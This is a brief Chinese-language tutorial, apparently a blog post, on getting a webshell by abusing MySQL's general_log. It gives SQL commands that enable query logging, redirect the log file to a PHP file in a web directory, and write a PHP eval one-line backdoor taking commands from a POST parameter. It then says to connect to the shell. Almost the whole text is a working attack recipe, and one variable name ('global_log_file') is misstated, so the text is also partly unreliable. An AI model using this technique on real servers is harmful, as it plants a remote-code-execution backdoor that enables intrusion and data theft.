利用mysql的general_log拿shell
general_log是mysql日志文件,可以记录mysql的操作。
show variables like '%general%'; //查询 general_log开启状态
set global general_log=on; //开启日志记录
set global_log_file='D:/wamp/www/xxx.php'; //将日志产生的默认路径改成php文件。
使用select写入一句话木马 select '<?php eval($_POST["cmd"]);?>'
直接连接webshell即可。
浙公网安备 33010602011771号